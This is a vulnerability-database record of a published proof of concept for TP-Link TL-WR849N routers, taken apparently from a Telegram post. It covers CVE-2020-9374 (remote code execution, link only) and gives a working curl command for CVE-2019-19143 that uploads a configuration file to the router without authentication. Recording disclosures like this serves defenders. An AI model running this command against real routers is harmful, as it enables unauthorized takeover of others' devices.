{"uuid": "9bdfd9fb-7fb9-4ee2-9c1a-18ffe12837a9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2020-9374", "type": "published-proof-of-concept", "source": "https://t.me/CyberSecurityTechnologies/727", "content": "#exploit\nTP-Link TL-WR849N ver. 0.9.1 4.16:\n\n1.CVE-2020-9374:\nRemote Code Execution\nhttps://www.exploit-db.com/exploits/48155\n\n2.CVE-2019-19143:\nAuthentication Bypass (Upload Firmware)\n]-&gt; PoC: \ncurl -i -X POST -H \"Content-Type: multipart/form-data\" -H \"Referer: http://TARGET/mainFrame.htm\" -F data=@conf.bin http://TARGET/cgi/confup\n\n]-&gt; REFS: https://github.com/ElberTavares/routers-exploit/tp-link\nhttps://fireshellsecurity.team/hack-n-routers/", "creation_timestamp": "2022-12-11T18:43:05.000000Z"}